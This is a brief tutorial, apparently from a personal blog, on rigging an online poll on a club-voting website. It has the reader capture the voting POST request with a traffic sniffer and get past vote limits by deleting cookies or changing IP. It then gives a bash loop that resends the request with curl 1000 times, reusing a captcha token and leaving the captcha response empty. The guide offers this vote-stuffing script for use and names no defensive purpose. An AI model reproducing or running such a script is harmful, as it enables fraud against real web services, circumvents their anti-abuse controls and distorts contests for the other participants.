1. Scan the traffic
Just capture the network traffic while simulate one sequence of voting. Possible tools you can use are Wireshark, Fiddler or Postman (used here). Normally the website will give you a cookie and/or save your IP to forbid another vote. If something went wrong with the sniffing just delete the cookie and/or change your IP. The important POST is happening after you pressed the submit button.
2. Write a script
After you have found the POST of interest you can write a script which sends this POST to the server over and over again. 🙂 You don’t need to send all the parameter as seen in the capture, just skip the unnecessary ones.
URL=https://clubs.star.de/<censored>;
PAR1="form_id=project_voting_form";
PAR2="form_build_id=";
PAR3="captcha_sid=1135309";
PAR4="captcha_token=3502f03e7930342a9ecc5f21e73692c1";
PAR5="captcha_response=";
PAR="${PAR1}&${PAR2}&${PAR3}&${PAR4}&${PAR5}";
for ((i=1; i<=1000; i++));
do
curl --data $PAR $URL;
done
3. Execute the script
Before the Script
After the Script